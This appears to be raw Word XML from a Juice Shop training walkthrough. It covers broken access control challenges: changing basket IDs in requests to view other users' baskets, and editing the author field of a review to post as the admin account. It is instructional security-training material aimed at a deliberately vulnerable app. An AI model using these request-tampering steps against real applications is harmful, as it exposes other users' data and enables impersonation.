        <w:t xml:space="preserve"> Navigate to the main page and add any juice or product to your shopping basket. This initializes a basket session or record in the database.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Inspect the Basket Request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Open your browser's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Developer Tools</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($F12$) and switch to the </w:t>
      </w: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18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Click on the shopping basket icon in the top right corner of the application to view your cart.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Look for a network request targeted at an endpoint structured like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rest/basket/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188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/BasketItems/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the Identifier:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notice how the URL or payload maps to a specific numeric ID representing your basket (for example, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rest/basket/2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Manipulate the Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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You can use the built-in "Edit and Resend" feature in your browser's Network tab (or a tool like Burp Suite) to modify that numeric value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Change your basket identifier to a different integer (for example, if your ID was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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, change it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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86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Send the modified request. If successful, the application will return the JSON data or render the product list belonging to another user's basket.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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eauh8i58lml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#6: Broken Access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vzh11le8s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Underlying Concept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flaw occurs when the application relies completely on parameters provided in the client-side API request body to assign ownership of data (like an author's email or user ID), rather than deriving the identity of the creator securely from the server-side session token.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pvoihdan7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Solve It in Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Navigate to Product Reviews:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log in, click on any product from the main dashboard to open its details window, and look for the option to write or submit a review.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Capture the Submission Request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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your browser's </w:t>
      </w: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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab is open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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 a text review and click the submit button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Locate the outgoing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request sent to the backend review endpoint (typically something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/api/Products/1/reviews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/rest/products/reviews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Analyze the Request Body:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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Examine the payload structure (the payload is sent as JSON data).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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Look for properties within the JSON object that dictate who the author is. Examples include parameters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"userId"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Modify the Attribute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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an intercepting tool or the "Edit and Resend" capability of the browser to alter the value of that parameter before sending it to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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 the email address or numerical identifier from your own account details to an arbitrary placeholder or another user's known address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admin@juice-sh.op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Ownership Bypass:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Send the request. Check the product details page again to verify if your newly submitted review appears under the identity of the unauthorized target user profile.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KMo5KTWtEPskEmNF2m7zVjLCnD5JfADq/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1bZ0zKtGBFIkYljWZNWpjESzUKEJng9pK/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/16315GypancnoGp024aueDRla_i8UusrC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drive.google.com/file/d/155Pyp7Oe5imwc45neD808ncmdMUKx1VJ/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1UfS3HHBkXGkVu373N41I7hPaPX-YFIwf/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/juice-shop/juice-shop/blob/master/data/static/users.yml" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1dQaoqBb1pWPZj8u4_W0ddXwu92ZfHZRp/view?usp=drive_link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18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